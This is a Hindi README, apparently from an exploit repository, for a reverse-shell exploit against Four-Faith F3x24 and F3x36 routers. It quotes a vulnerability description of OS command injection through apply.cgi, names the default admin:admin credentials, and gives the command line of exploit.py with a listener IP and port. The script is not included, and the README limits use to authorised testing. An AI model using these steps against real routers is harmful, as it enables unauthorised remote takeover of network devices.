
फोर-फेथ राउटर्स के लिए एक एक्सप्लॉइट जो रिवर्स शेल प्राप्त करने हेतु है
यह Four-Faith राउटर मॉडल F3x24 और F3x36 के लिए एक एक्सप्लॉइट है जिससे रिवर्स शेल प्राप्त किया जा सकता है।
"Four-Faith राउटर मॉडल F3x24 और F3x36 ऑपरेटिंग सिस्टम (OS) कमांड इंजेक्शन भेद्यता से प्रभावित हैं। कम से कम फर्मवेयर संस्करण 2.0 प्रमाणित और रिमोट हमलावरों को apply.cgi के माध्यम से सिस्टम समय संशोधित करते समय HTTP पर मनमाने OS कमांड निष्पादित करने की अनुमति देता है। इसके अतिरिक्त, इस फर्मवेयर संस्करण में डिफ़ॉल्ट क्रेडेंशियल हैं, जिन्हें यदि नहीं बदला गया, तो यह भेद्यता प्रभावी रूप से एक अप्रमाणित और रिमोट OS कमांड निष्पादन समस्या बन जाएगी।"
स्रोत: nist.gov
यह स्क्रिप्ट VulnCheck द्वारा देखे गए पेलोड पर आधारित है।
एक्सप्लॉइट चलाने से पहले अपनी मशीन पर एक TCP सर्वर शुरू करें।
फिर चलाएँ
python exploit.py [-u USERNAME] [-p PASSWORD] [-rport REMOTE_PORT] RHOST LHOST LPORT
जहाँ
RHOST रिमोट IP पता है। आप एक डोमेन भी जोड़ सकते हैं।LHOST आपकी मशीन पर आपके TCP सर्वर का IP है।LPORT आपके TCP सर्वर का पोर्ट है।USERNAME और राउटर के क्रेडेंशियल हैं। डिफ़ॉल्ट admin:admin है।PASSWORDRPORT राउटर का रिमोट पोर्ट है। डिफ़ॉल्ट 80 है।सुनिश्चित करें कि इस एक्सप्लॉइट का उपयोग केवल परीक्षण और अधिकृत वातावरण में करें।
इसे कभी भी दुर्भावनापूर्ण उद्देश्यों के लिए उपयोग न करें।